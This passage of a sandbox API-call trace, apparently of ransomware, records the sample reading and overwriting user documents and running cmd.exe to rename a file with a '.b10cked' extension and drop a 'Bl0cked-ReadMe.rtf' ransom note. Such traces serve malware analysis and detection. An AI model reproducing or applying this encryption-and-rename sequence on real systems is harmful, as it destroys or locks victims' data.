lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.561] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x95cb [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x90e3 [0233.562] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x95cb [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x95cb [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.564] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x4ae4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x4ae4, lpOverlapped=0x0) returned 1 [0233.564] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.564] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x4ae4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x4ae4, lpOverlapped=0x0) returned 1 [0233.564] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-19172, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x4ae7 [0233.564] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x4ae4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x4ae4, lpOverlapped=0x0) returned 1 [0233.564] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-19172, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x4ae7 [0233.564] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x4ae4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x4ae4, lpOverlapped=0x0) returned 1 [0233.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oR2F.csv", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0233.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="oR2F.csv", cchWideChar=8, lpMultiByteStr=0x131324c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oR2F.csv", lpUsedDefaultChar=0x0) returned 8 [0233.568] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x95cb [0233.568] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.568] CloseHandle (hObject=0x1b4) returned 1 [0233.569] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\oR2F.csv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv") returned 0x30 [0233.569] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0233.570] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xb08, dwThreadId=0xb2c)) returned 1 [0233.624] CloseHandle (hObject=0x120) returned 1 [0233.624] CloseHandle (hObject=0x1b4) returned 1 [0233.624] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0233.624] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.624] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount2=34) returned 3 [0233.624] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0233.624] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.624] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.624] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.624] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.624] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.624] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0233.625] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.625] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.625] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xdec, dwThreadId=0xde4)) returned 1 [0233.632] CloseHandle (hObject=0x120) returned 1 [0233.632] CloseHandle (hObject=0x1b4) returned 1 [0233.632] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0233.632] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.632] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 
0x1fec00 [0233.632] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.632] ReleaseMutex (hMutex=0xf8) returned 1 [0233.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.632] ReleaseMutex (hMutex=0xf8) returned 1 [0233.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.632] ReleaseMutex (hMutex=0xf8) returned 1 [0233.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.632] ReleaseMutex (hMutex=0xf8) returned 1 [0233.632] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\gaY66uwM4.ots" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\gay66uwm4.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29042195744) returned 1 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb60f [0233.634] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xbaf7 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xbaf7 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.635] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.635] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5d7a, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5d7a, lpOverlapped=0x0) returned 1 [0233.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.636] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5d7a, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5d7a, lpOverlapped=0x0) returned 1 [0233.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-23930, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 